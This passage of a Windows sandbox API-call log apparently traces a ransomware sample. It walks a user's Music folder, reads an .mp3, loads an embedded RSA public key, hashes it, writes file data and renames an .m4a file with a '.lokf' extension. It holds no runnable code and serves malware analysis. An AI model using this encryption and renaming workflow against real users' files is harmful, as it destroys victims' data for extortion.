[0059.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0059.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c859b0 | out: hHeap=0x660000) returned 1 [0059.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0059.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85998 | out: hHeap=0x660000) returned 1 [0059.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85968 | out: hHeap=0x660000) returned 1 [0059.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85950 | out: hHeap=0x660000) returned 1 [0059.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c885b0 | out: hHeap=0x660000) returned 1 [0059.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0059.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0059.848] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0059.848] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0059.848] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.848] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.848] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0059.848] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.848] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.848] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0059.848] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c88ae8*, nNumberOfBytesToWrite=0x139e8, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c88ae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x139e8, lpOverlapped=0x0) returned 1 [0059.848] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c88ae8 | out: hHeap=0x660000) returned 1 [0059.848] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x139ed, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.848] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.848] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.848] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.848] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0059.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0059.848] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3294ac8 [0059.848] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.848] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.848] WriteFile (in: hFile=0x5cc, lpBuffer=0x3294ac8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3294ac8*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0059.849] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3294ac8 | out: hHeap=0x660000) returned 1 [0059.849] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.849] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.849] CloseHandle (hObject=0x5cc) returned 1 [0059.850] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0059.850] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0059.850] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8610 | out: hHeap=0x660000) returned 1 [0059.850] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\JzgoC0SQ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\jzgoc0sq.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\JzgoC0SQ.m4a.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\jzgoc0sq.m4a.lokf")) returned 1 [0059.850] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.850] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.850] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.851] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adbb0 | out: hHeap=0x660000) returned 1 [0059.851] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a15c810, ftCreationTime.dwHighDateTime=0x1d4d286, ftLastAccessTime.dwLowDateTime=0x1538d8b0, ftLastAccessTime.dwHighDateTime=0x1d4c821, ftLastWriteTime.dwLowDateTime=0x1538d8b0, ftLastWriteTime.dwHighDateTime=0x1d4c821, nFileSizeHigh=0x0, nFileSizeLow=0x12b9d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nKN_va3f4.mp3", cAlternateFileName="NKN_VA~1.MP3")) returned 1 [0059.851] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.851] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adbb0 [0059.851] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.851] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\nKN_va3f4.mp3") returned=".mp3" [0059.851] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\nKN_va3f4.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\nkn_va3f4.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.851] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=76701) returned 1 [0059.852] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.854] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x12b77, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.854] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.855] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.855] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.855] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x12b9d, lpOverlapped=0x0) returned 1 [0059.855] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.855] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.855] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.855] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.855] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.856] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.856] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.856] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.856] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.856] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.856] GetLastError () returned 0x0 [0059.856] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.856] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.856] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.856] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.856] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.856] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.856] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.856] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.856] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.856] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x12ba0) returned 0x9c88ae8 [0059.857] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0059.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c885b0 [0059.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85950 [0059.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c885f8 [0059.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85968 [0059.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85998 [0059.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0059.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c859b0 [0059.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.857] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85998 | out: hHeap=0x660000) returned 1 [0059.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c859b0 | out: hHeap=0x660000) returned 1 [0059.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0059.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0059.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0059.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c859b0 [0059.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85998 [0059.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0059.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0059.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0059.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c859b0 | out: hHeap=0x660000) returned 1 [0059.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85998 | out: hHeap=0x660000) returned 1 [0059.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0059.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0059.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.858] GetCurrentThreadId () returned 0x9e0 [0059.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c84bf8 [0059.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0059.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0059.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.858] GetCurrentThreadId () returned 0x9e0 [0059.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0059.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0059.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85998 [0059.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0059.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c859b0 [0059.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85980 [0059.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857d0 [0059.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0059.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0059.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0059.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c859c8 [0059.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0059.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0059.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0059.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85998 | out: hHeap=0x660000) returned 1 [0059.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85998 [0059.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0059.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0059.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0059.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0059.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.860] RtlAllocateHeap (HeapHandle=0x660000, 